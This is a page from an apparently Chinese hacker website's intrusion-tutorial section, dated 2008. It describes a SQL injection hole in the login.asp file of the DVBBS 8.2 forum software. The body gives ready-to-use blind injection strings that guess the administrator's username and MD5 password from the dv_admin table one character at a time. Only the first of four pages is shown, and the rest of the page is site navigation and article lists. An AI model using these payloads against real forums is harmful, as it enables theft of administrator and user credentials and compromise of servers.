黑客集中营首页|黑客新闻|黑客文章|黑营动画|黑客软件|黑客论坛 |黑客商城 |黑营招聘
热门搜索:杀毒 安全工具 黑客集中营 安全 黑客
 您现在的位置: 黑客集中营 >> 技术中心 >> 入侵教程 >> 正文
动网DVBBS8.2 注入漏洞官方更新文件的分析报告
作者:佚名    文章来源:本站整理    点击数:    更新时间:2008-6-2          ★★★
DVBBS8.2 注入漏洞官方更新文件的分析报告

  昨天有人贴出漏漏洞。。问题出在LOGIN.ASP中。。。具体引用原文如下:

  漏洞描述:

  (引用文字具体在:)

  中国应用最广泛的论坛程序,最新dvbbs8.2的注入漏洞0day 包括官方版本在内的access及sql版本。漏洞存在源程序 login.asp

  Login.asp 程序在检查隐藏值user用户名的登陆时没有过滤特殊符号,导致可以利用sql注入方式猜解出论坛管理员及所有用户的密码或者执行其它高级的sql语句直接威胁到服务器安全。

  判断漏洞

  特别注意:admin等。。。必须在论坛有注册。。。

  就是登陆名必须是已经在论坛注册了的。。

  根据返回信息,第一条显示用户名或密码错误第二条显示无此用户,猜解用户

  where' and 1=(select count(*) from dv_admin where left(username,1)='a') and '1'='1

  where' and 1=(select count(*) from dv_admin where left(username,2)='ad') and '1'='1

  ……………………….

  ……………………

  …………………….

  猜解密码(md5加密)

  where' and 1=(select count(*) from dv_admin where left(password,1)='1') and '1'='1

  where' and 1=(select count(*) from dv_admin where left(password,2)='15') and '1'='1

[1] [2] [3] [4] 下一页

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:封情
  • 下一篇文章:
  • 热门文章
    普通文章Windows 2K 微软最成功
    普通文章企业防病毒策略如何做
    普通文章网络安全特警2005评测
    普通文章网吧生存手册:10秒钟
    普通文章资深Linux程序员的开发
    普通文章用组策略限制软件使用
    普通文章浅谈网络监控软件的部
    普通文章入侵检测及网络安全发
    普通文章谈谈针对Linux的病毒起
    普通文章普遍存在的在线安全四
    相关文章
    5少年黑客买录像学习盗号
    国外黑客站点
    黑客探取密码原理制定相
    新手学习黑客需要注意的
    入侵检测及网络安全发展
    计算机病毒的入侵方式及
    邮件病毒入侵后的清除步
    宽带用户防范病毒入侵的
    黑客是如何骗取你执行木
    黑客快速入门
    用Dos命令进行加锁 防病
    常用的一些注入命令,方便
    解析“肉鸡”电脑“商业
    提升诺顿杀毒功能的小技
    为加快速度关闭Linux下不
    十个常用网络密码安全保
    暴库漏洞原理及规律高级
    小心高额话费! 你的ADS
    拒绝成肉鸡 教你几招让黑
    挑战潜规则!趋势抵制VB
    关于我们 | 加入会员| 投稿方法 | 友情连接 | 网站地图 | 黑营论坛 | 黑营招聘
    加入会员咨询QQ:66647470 合作QQ:197430910 投稿:66647470 mail:85soft#163.com(#改@)
    版权:2003-2008HACK52.COM 集中营宣言普及黑客安全意识!打造顶尖黑客安全资讯网!
    浙ICP备06050453号